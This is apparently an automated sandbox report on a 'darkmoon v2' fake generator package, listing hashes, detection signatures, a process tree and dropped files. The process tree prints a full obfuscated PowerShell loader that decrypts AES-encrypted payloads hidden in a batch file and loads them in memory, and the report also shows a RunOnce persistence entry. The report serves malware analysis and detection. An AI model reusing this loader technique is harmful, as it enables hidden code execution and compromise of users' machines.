Analysis
- max time kernel: 120s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 02-06-2024 15:40
Static task: static1

Behavioral task behavioral1
- Sample: darkmoon v2/lib/AyBYMBjlvU.bat
- Resource: win7-20240419-en

Behavioral task behavioral2
- Sample: darkmoon v2/lib/AyBYMBjlvU.bat
- Resource: win10v2004-20240508-en

Behavioral task behavioral3
- Sample: darkmoon v2/lib/DarkMoon_Gen.exe
- Resource: win10v2004-20240426-en

Behavioral task behavioral4
- Sample: darkmoon v2/start.bat
- Resource: win7-20240221-en

Behavioral task behavioral5
- Sample: darkmoon v2/start.bat
- Resource: win10v2004-20240508-en
General
- Target: darkmoon v2/start.bat
- Size: 82B
- MD5: e6ede72374e4f7b8b907d4099c76f4d4
- SHA1: 146899cf959ada383b0a258b06da7963ef0d1c70
- SHA256: c07fbd6c49d83eb8399435f9972551d2c73a29e5914a25640639191d187dd80d
- SHA512: 1b2d0cd4a5deae331ed16f383831f4ff7ba1c5b7f6906a35354dfd420ca44f17e3469157f2327685a6aa9773175425aa145faa2d4866030d131334eb36426fcc
Malware Config
Signatures
- Executes dropped EXE (1 IoCs)
  Processes (pid process): 2380 AyBYMBjlvU.bat.exe
- Loads dropped DLL (1 IoCs)
  Processes (pid process): 2684 cmd.exe
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes: DarkMoon_Gen.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" (process: DarkMoon_Gen.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 1 IoCs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Delays execution with timeout.exe (13 IoCs)
  Processes (pid process): 1888 timeout.exe, 2008 timeout.exe, 2240 timeout.exe, 2364 timeout.exe, 1972 timeout.exe, 2384 timeout.exe, 2308 timeout.exe, 1604 timeout.exe, 1524 timeout.exe, 2776 timeout.exe, 2896 timeout.exe, 2816 timeout.exe, 2272 timeout.exe
- Runs ping.exe (1 TTPs, 17 IoCs)
  Processes (pid process): 2660 PING.EXE, 2128 PING.EXE, 2508 PING.EXE, 2408 PING.EXE, 2840 PING.EXE, 2548 PING.EXE, 2872 PING.EXE, 868 PING.EXE, 2632 PING.EXE, 760 PING.EXE, 2436 PING.EXE, 1132 PING.EXE, 2576 PING.EXE, 2432 PING.EXE, 848 PING.EXE, 1964 PING.EXE, 1644 PING.EXE
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes (pid process): 2380 AyBYMBjlvU.bat.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description pid process): Token: SeDebugPrivilege 2380 AyBYMBjlvU.bat.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: cmd.exe, DarkMoon_Gen.exe, cmd.exe, cmd.exe
  Events (source pid/process wrote to memory of target pid/process; the sandbox logged most writes three times, 64 events in total):
  PID 2168 cmd.exe wrote to memory of 2476 DarkMoon_Gen.exe (3 events)
  PID 2168 cmd.exe wrote to memory of 2684 cmd.exe (3 events)
  PID 2476 DarkMoon_Gen.exe wrote to memory of 2164 cmd.exe (3 events)
  PID 2164 cmd.exe wrote to memory of 2932 chcp.com (3 events)
  PID 2164 cmd.exe wrote to memory of 2896 timeout.exe (3 events)
  PID 2164 cmd.exe wrote to memory of 2660 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 2548 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 1132 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 2576 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 2128 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 2432 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 2872 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 2508 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 2408 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 2364 timeout.exe (3 events)
  PID 2164 cmd.exe wrote to memory of 2840 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 1972 timeout.exe (3 events)
  PID 2164 cmd.exe wrote to memory of 868 PING.EXE (3 events)
  PID 2684 cmd.exe wrote to memory of 2380 AyBYMBjlvU.bat.exe (3 events)
  PID 2164 cmd.exe wrote to memory of 1888 timeout.exe (3 events)
  PID 2164 cmd.exe wrote to memory of 848 PING.EXE (3 events)
  PID 2164 cmd.exe wrote to memory of 2384 timeout.exe (1 event)
Processes
Process tree; [n] is the depth of the process in the tree, each process is followed by its command line and the signatures it triggered.

[1] C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\darkmoon v2\start.bat"
  - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\DarkMoon_Gen.exe
    Command line: DarkMoon_Gen.exe
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
      Command line: cmd /c "Dark Moon gen.bat"
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\chcp.com
        Command line: chcp 65001
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 2
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping localhost -n 1
        - Runs ping.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping localhost -n 1
        - Runs ping.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping localhost -n 1
        - Runs ping.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping localhost -n 1
        - Runs ping.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping localhost -n 1
        - Runs ping.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping localhost -n 1
        - Runs ping.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping localhost -n 1
        - Runs ping.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping localhost -n 1
        - Runs ping.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping discord.com
        - Runs ping.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 0
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping www.paysafecard.com
        - Runs ping.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 0
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping www.amazon.com
        - Runs ping.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 0
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping play.google.com
        - Runs ping.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 0
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping store.steampowered.com
        - Runs ping.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 0
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping netflix.com
        - Runs ping.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 0
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping www.spotify.com
        - Runs ping.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 0
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping www.xbox.com
        - Runs ping.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 0
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 1
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 2
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 2
        - Delays execution with timeout.exe
      [4] C:\Windows\system32\PING.EXE
        Command line: ping www.google.com
        - Runs ping.exe
      [4] C:\Windows\system32\timeout.exe
        Command line: timeout 2
        - Delays execution with timeout.exe
  [2] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /K AyBYMBjlvU.bat
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe
      Command line: "AyBYMBjlvU.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.bat
  Filesize: 35KB
  MD5: c153581143e0b72cecae38a393991a4b
  SHA1: da43d03b19765594ff124415a060551343823a39
  SHA256: 2fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005
  SHA512: 8c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f
- \Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- memory/2380-8-0x000000001B140000-0x000000001B422000-memory.dmp
  Filesize: 2.9MB
- memory/2380-9-0x0000000001E70000-0x0000000001E78000-memory.dmp
  Filesize: 32KB